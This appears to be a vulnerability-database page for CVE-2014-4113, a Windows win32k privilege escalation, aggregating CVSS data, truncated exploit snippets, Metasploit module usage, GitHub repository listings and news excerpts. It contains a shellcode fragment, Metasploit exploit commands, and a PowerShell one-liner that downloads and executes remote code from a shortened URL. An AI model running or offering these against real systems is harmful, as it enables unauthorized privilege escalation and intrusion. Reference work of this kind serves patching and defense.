7.2
CVSSv2

CVE-2014-4113

Published: 15/10/2014 Updated: 12/10/2018
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 866
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, as exploited in the wild in October 2014, aka "Win32k.sys Elevation of Privilege Vulnerability."

Vulnerability Trend

Exploits

#include "hdh" // EDB Note ~ Download: githubcom/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46945rar byte __s_code[]={ 0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 , 0x81 ,0xEC ,0xE0 ,0x00 ,0x00 ,0x00 ,0x45 ,0x33 ,0xF6 ,0x49 ,0x89 ,0xCB ,0x4C ,0x89 ,0x70 ,0x18 , ...
Sources: labsmwrinfosecuritycom/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113pdf githubcom/sam-b/CVE-2014-4113 EDB Mirror: wwwexploit-dbcom/docs/english/39665-windows-kernel-exploitation-101-exploiting-cve-2014-4113pdf Trigger and exploit code for CVE-2014-4113: githubcom/offensive-security/exploitdb ...
# Windows 80 - 81 x64 TrackPopupMenu Privilege Escalation (MS14-058) # CVE-2014-4113 Privilege Escalation # wwwoffensive-securitycom # Thx to Moritz Jodeit for the beautiful writeup # wwwexploit-dbcom/docs/35152pdf # Target OS Windows 80 - 81 x64 # Author: Matteo Memelli ryujin <at> offensive-securitycom # EDB Note: ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Post::Windows ...

Mailing Lists

This Metasploit module exploits a NULL Pointer Dereference in win32ksys, the vulnerability can be triggered through the use of TrackPopupMenu Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution This Metasploit module has been tested successfully on Windows XP SP3, Wind ...
This Metasploit module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege It requires a CLSID string ...
This Metasploit module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege Currently the module does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token ...
Microsoft Windows versions 80 and 81 on x64 TrackPopupMenu privilege escalation exploit that leverages the vulnerability documented in MS14-058 ...

Metasploit Modules

Windows TrackPopupMenu Win32k NULL Pointer Dereference

This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.

msf > use exploit/windows/local/ms14_058_track_popup_menu
      msf exploit(ms14_058_track_popup_menu) > show targets
            ...targets...
      msf exploit(ms14_058_track_popup_menu) > set TARGET <target-id>
      msf exploit(ms14_058_track_popup_menu) > show options
            ...show and set options...
      msf exploit(ms14_058_track_popup_menu) > exploit
Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)

This module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. It requires a CLSID string.

msf > use exploit/windows/local/ms16_075_reflection_juicy
msf exploit(ms16_075_reflection_juicy) > show targets
    ...targets...
msf exploit(ms16_075_reflection_juicy) > set TARGET < target-id >
msf exploit(ms16_075_reflection_juicy) > show options
    ...show and set options...
msf exploit(ms16_075_reflection_juicy) > exploit
Windows Net-NTLMv2 Reflection DCOM/RPC

Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. Currently the module does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token.

msf > use exploit/windows/local/ms16_075_reflection
msf exploit(ms16_075_reflection) > show targets
    ...targets...
msf exploit(ms16_075_reflection) > set TARGET < target-id >
msf exploit(ms16_075_reflection) > show options
    ...show and set options...
msf exploit(ms16_075_reflection) > exploit

Github Repositories

Exploit-CVE-2014-4113 CVE-2014-4113 is a Local &amp; Privilege Escalation Exploits You can get the SYSTEM Privilege support platform: x86; windows xp and windowx 7 usage: 打开cmdexe,切换到当前程序所在目录,执行如下命令: cve-2014-4113exe [target program name] for example: cve-2014-4113exe calcexe

CVE-2014-4113 PowerShell CVE-2014-4113 x64 Windows Only iex (New-Object NetWebClient)DownloadString('bitly/1qosbJH')

CVE-2014-4113 Trigger and exploit code for CVE-2014-4113

cveXXXX poc/exp add cve-2014-4113 win7x64

AWE/OSEE Preparation Blog addaxsoftcom/blog/offensive-security-advanced-windows-exploitation-awe-osee-review/ infosecflashcom/2018/11/04/my-awe-experience/ trickster0wordpresscom/2018/10/27/awe-course-review-by-offensive-security/ wwwjscybersecio/blogpage/Offensive-Security-Exploitation-Expert-OSEE Public Reference Materials by Module Modu

Windows stack overflows Stack Base Overflow Articles + Win32 Buffer Overflows (Location, Exploitation and Prevention) - by Dark spyrit [1999] + Writing Stack Based Overflows on Windows - by Nish Bhalla’s [2005] + Stack Smashing as of Today - by Hagen Fritsch [2009] + SMASHING C++ VPTRS - by rix [2000] ## Windows heap overflows Heap Base Overflow Articles + Third Generat

Awesome Windows Exploitation A curated list of awesome Windows Exploitation resources, and shiny things There is no pre-established order of items in each category, the order is for contribution If you want to contribute, please read the guide Table of Contents Windows stack overflows Windows heap overflows Kernel based Windows overflows Windows Kernel Memory Corruption Re

CVE 这里有我复现过的一些漏洞资源,欢迎下载,漏洞的复现过程在我的博客或者csdn上都有,欢迎交流

Awesome Windows Exploitation A curated list of awesome Windows Exploitation resources, and shiny things There is no pre-established order of items in each category, the order is for contribution If you want to contribute, please read the guide Table of Contents Windows stack overflows Windows heap overflows Kernel based Windows overflows Windows Kernel Memory Corruption Re

awesome-windows-security-development Forked from ExpLife/awesome-windows-kernel-security-developmentbutHe deleted Welcome add project or something to list(ple use issuse) windows kernel driver with c++ runtime githubcom/ExpLife/DriverSTL githubcom/sysprogs/BazisLib githubcom/AmrThabet/winSRDF githubcom/sidyhe/dxx githubcom/zer0m

awesome-windows-kernel-security-development windows kernel driver with c++ runtime githubcom/HoShiMin/Kernel-Bridge githubcom/wjcsharp/Common  githubcom/ExpLife/DriverSTL githubcom/sysprogs/BazisLib githubcom/AmrThabet/winSRDF githubcom/sidyhe/dxx githubcom/zer0mem/libc githubcom/eladraz/XDK

awesome-windows-security-development Forked from ExpLife/awesome-windows-kernel-security-developmentbutHe deleted windows kernel driver with c++ runtime githubcom/ExpLife/DriverSTL githubcom/sysprogs/BazisLib githubcom/AmrThabet/winSRDF githubcom/sidyhe/dxx githubcom/zer0mem/libc githubcom/eladraz/XDK githubcom

awesome-windows-kernel-security-development pe file format githubcom/corkami/pics meltdown/spectre poc githubcom/turbo/KPTI-PoC-Collection githubcom/gkaindl/meltdown-poc githubcom/feruxmax/meltdown githubcom/Eugnis/spectre-attack lightweight c++ gui library githubcom/zlgopen/awtk githubcom/idea4good/GuiLite htt

项目简介 一个 Red Team 攻击的生命周期,整个生命周期包括: 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、在所有攻击结束之后清理并退出战场。 相关资源列表 mitre-attackgithubio/ mitre科技机构对

项目简介 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、擦痕迹。 address | introduce | -|-|- 名字 | 介绍 | 安全相关资源列表 arxivorg 康奈尔大学(Cornell University)开放文档 githubcom/sindresorhus/awesome

项目简介 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、擦痕迹。 安全相关资源列表 arxivorg 康奈尔大学(Cornell University)开放文档 githubcom/sindresorhus/awesome awesome系列 wwwowasporgcn/owasp-pr

Recent Articles

50k Servers Infected with Cryptomining Malware in Nansh0u Campaign
Threatpost • Lindsey O'Donnell • 29 May 2019

Up to 50,000 servers were infected over the past four months as part of a high-profile cryptojacking campaign, believed to orchestrated by Chinese-language adversaries.
Researchers with Guardicore Labs, who disclosed the campaign Wednesday, said that the Nansh0u​ campaign (named due to a text file string in the attacker’s servers being called Nansh0u) is “not another run-of-the-mill mining attack.”
The cryptomining malware, which targets an open source cryptocurrency called T...

Nansh0u Miner Attack Infects 50K MS-SQL, PHPMyAdmin Servers
BleepingComputer • Sergiu Gatlan • 29 May 2019

More than 50,000 MS-SQL and PHPMyAdmin were compromised by Chinese hackers and used to surreptitiously mine for TurtleCoin as part of a large-scale cryptojacking campaign dubbed Nansh0u.
The campaign was detected during early-April and it started as far back as back February 26, targeting servers located all over the world and belonging to companies from a wide range of industry sectors, ​​"with over seven hundred new victims per day."
"During our investigation, we found 20 ve...

Researchers Crack Furtim, SFG Malware Connection
Threatpost • Tom Spring • 18 Jul 2016

New research is challenging what security researchers know about Furtim, a new malware strain that has been compared to Stuxnet because of its believed targeting of industrial controls in energy companies.
According to security experts at Damballa, Furtim and the recently discovered SFG malware are one in the same – only varying by a few lines of code that include the HTTP header information.
The research clarifies earlier investigations that distinguished Furtim and SFG as clos...

Malware Dropper Built to Target European Energy Company
Threatpost • Michael Mimoso • 12 Jul 2016

A malware dropper with designs on specific targets was found in a private underground forum and is likely the predecessor to the Furtim malware that was uncovered in May.
Researchers at SentinelOne today published a report that says the dropper sample they investigated, which they’re calling SFG, was built to target at least one unnamed European energy company. The report says the dropper is likely the work of a state-sponsored group and is used as the first stage of targeted attacks.

Zero-day hacking group resorts to UNICORN SMUT-SLINGING
The Register • Darren Pauli • 26 Nov 2014

Playboy ploy not beneath APT3

Sysadmins who have not yet patched their Windows boxes against the 18-year-old "unicorn-like" OLE bug disclosed last month could expect a deluge of spear phishing smut from a group once confined to lofty targeted zero-day attacks.
The talented APT3 group was behind widespread zero-day attacks code-named Clandestine Fox earlier this year and was now targeting recently patched Windows vulnerabilities, according to FireEye researchers.
That group had begun spewing spear-phishing emails ...

Two Patched Zero Days Targeting Windows Kernel
Threatpost • Chris Brook • 15 Oct 2014

After they were patched in yesterday’s round of Patch Tuesday security bulletins, security firms have begun to peel back the layers on two zero-day vulnerabilities that are being used in limited, targeted attacks against Microsoft’s Windows Kernel.
According to FireEye, one of the firms that conducted research on both of the vulnerabilities, the flaws can lead to elevation of privilege if left unpatched. Both vulnerabilities are being used in attacks against some major corporations, t...

Microsoft Security Updates October 2014
Securelist • Kurt Baumgartner • 14 Oct 2014

Update (2014.10.15) – administrative notes for preparation… Friends on Twitter let me know their update cycle took close to 20 minutes on Windows 7. Yesterday, others on 8.1 told me their update download was around a gig, for some it was ~200 mb. Also, this cycle likely requires everyone a reboot to complete.
*******
This morning was possibly one of the most information rich in the history of Microsoft’s patch Tuesdays. Last month, we pointed out the Aurora Panda/DeputyDog...